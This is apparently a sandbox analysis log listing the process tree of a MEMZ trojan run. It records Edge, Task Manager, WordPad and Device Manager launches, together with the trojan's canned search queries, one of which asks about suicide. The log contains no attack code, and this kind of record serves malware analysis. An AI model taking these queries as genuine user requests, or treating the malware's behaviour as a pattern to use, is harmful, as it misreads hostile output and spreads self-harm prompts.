C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11244 /prefetch:1
5⤵
PID:6624

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10672 /prefetch:1
5⤵
PID:7128

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8384 /prefetch:1
5⤵
PID:3028

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9200 /prefetch:1
5⤵
PID:3692

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10700 /prefetch:1
5⤵
PID:7148

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8836 /prefetch:1
5⤵
PID:6376

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8212 /prefetch:1
5⤵
PID:1112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10632 /prefetch:1
5⤵
PID:5460

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10576 /prefetch:1
5⤵
PID:4800

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10572 /prefetch:1
5⤵
PID:3304

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11400 /prefetch:1
5⤵
PID:2832

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=how+2+remove+a+virus
4⤵
PID:5252

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f4718
5⤵
PID:5220

C:\Windows\SysWOW64\Taskmgr.exe
"C:\Windows\System32\Taskmgr.exe"
4⤵
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5392

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=minecraft+hax+download+no+virus
4⤵
PID:6036

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f4718
5⤵
PID:4052

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=how+2+buy+weed
4⤵
PID:4932

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=how+to+get+money
4⤵
PID:3700

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f4718
5⤵
PID:5004

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=the+memz+are+real
4⤵
PID:5536

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f4718
5⤵
PID:3068

C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe
"C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:2948

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
5⤵
PID:3376

C:\Windows\SysWOW64\mmc.exe
"C:\Windows\system32\mmc.exe" "C:\Windows\System32\devmgmt.msc"
4⤵
- Suspicious use of SetWindowsHookEx
PID:772

C:\Windows\system32\mmc.exe
"C:\Windows\System32\devmgmt.msc" "C:\Windows\System32\devmgmt.msc"
5⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:1916

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=virus.exe
4⤵
PID:5384

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f4718
5⤵
PID:2344

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=batch+virus+download
4⤵
PID:1384

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f4718
5⤵
PID:5160

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=best+way+to+kill+yourself
4⤵
PID:5848

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f4718
5⤵
PID:5852

C:\Windows\SysWOW64\Taskmgr.exe
"C:\Windows\System32\Taskmgr.exe"
4⤵
PID:3848

C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe
"C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:4416

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=batch+virus+download
4⤵
PID:5516

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f4718
5⤵
PID:5024

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=how+to+remove+memz+trojan+virus
4⤵
PID:3124

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f4718
5⤵
PID:3020

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=vinesauce+meme+collection
4⤵
PID:3128

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f4718
5⤵
PID:2752

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=mcafee+vs+norton
4⤵
PID:4972

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=is+illuminati+real
4⤵
PID:3744

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f4718
5⤵
PID:5208

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe"
4⤵
PID:5748

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=how+to+create+your+own+ransomware
4⤵
PID:4340

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f4718
5⤵
PID:5388

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://softonic.com/
4⤵
PID:5832

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xdc,0x100,0x104,0x9c,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f4718
5⤵
PID:2632

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=how+to+create+your+own+ransomware
4⤵
PID:6756

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f4718
5⤵
PID:6776

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://pcoptimizerpro.com/
4⤵
PID:6340

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f4718
5⤵
PID:6320

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://answers.microsoft.com/en-us/protect/forum/protect_other-protect_scanning/memz-malwarevirus-trojan-completely-destroying/268bc1c2-39f4-42f8-90c2-597a673b6b45
4⤵
PID:4312

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f4718
5⤵
PID:6168

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=virus.exe
4⤵
PID:6488

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f4718
5⤵
PID:316

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=batch+virus+download
4⤵
PID:6288

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f4718
5⤵
PID:6148

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://play.clubpenguin.com/
4⤵
PID:4752

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xfc,0x10c,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f4718
5⤵
PID:7164

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=john+cena+midi+legit+not+converted
4⤵
PID:1500

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3c2f46f8,0x7ffe3c2f4708,0x7ffe3c2f4718
5⤵
PID:2992

C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe
"C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe"
4⤵
PID:6608

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2312

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3624

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2ec 0x4a4
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4748

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
